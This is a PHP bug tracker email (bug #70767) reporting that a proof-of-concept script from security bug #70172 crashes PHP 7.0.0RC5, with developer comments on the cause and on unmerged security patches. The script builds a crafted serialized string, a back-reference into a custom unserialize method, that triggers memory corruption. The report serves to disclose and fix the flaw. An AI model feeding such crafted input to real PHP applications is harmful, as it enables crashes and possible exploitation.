Bug #70767 [Ana]: crash after script execution
| From: | laruence@php.net | Date: | Fri, 23 Oct 2015 08:49:23 +0000 |
| Subject: | Bug #70767 [Ana]: crash after script execution | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-196766@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=70767&edit=1
ID: 70767
Updated by: laruence@php.net
Reported by: liska at avast dot com
Summary: crash after script execution
Status: Analyzed
Type: Bug
Package: Reproducible crash
Operating System: windows 7 64-bit
PHP Version: 7.0.0RC5
Assigned To: laruence
Block user comment: N
Private report: N
New Comment:
should be: https://3v4l.org/GcebX
Previous Comments:
------------------------------------------------------------------------
[2015-10-23 08:48:24] laruence@php.net
maybe the 5.6 behaviors wrongly , https://3v4l.org/new
reference to a internal (external) object is not allowed.
------------------------------------------------------------------------
[2015-10-23 01:22:11] ryat@php.net
These security patches are not merged yet to master/7.0
http://news.php.net/php.internals/87998
------------------------------------------------------------------------
[2015-10-22 13:18:56] laruence@php.net
confirm this , but I don't see a easy way to fix it. the problem is, we are not using zval **
anymore.. :<
------------------------------------------------------------------------
[2015-10-22 12:01:46] liska at avast dot com
Description:
------------
First PoC script from #70172 causes segfault in the middle of the dump. I'm using
php-7.0.0RC5-Win32-VC14-x64 thread safe.
Test script:
---------------
class obj implements Serializable
{
private $data;
public function serialize()
{
return serialize($this->data);
}
public function unserialize($data)
{
$this->data = unserialize($data);
$this->data = 1;
}
}
$inner = 'a:0:{}';
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner .
'}i:1;R:3;}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi' . $i;
}
var_dump($data);
Expected result:
----------------
produced by PHP 5.6.14 that contains fix to #70172
array(2) {
[0]=>
object(obj)#1 (1) {
["data":"obj":private]=>
int(1)
}
[1]=>
array(0) {
}
}
Actual result:
--------------
array(2) {
[0]=>
Segmentation fault
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=70767&edit=1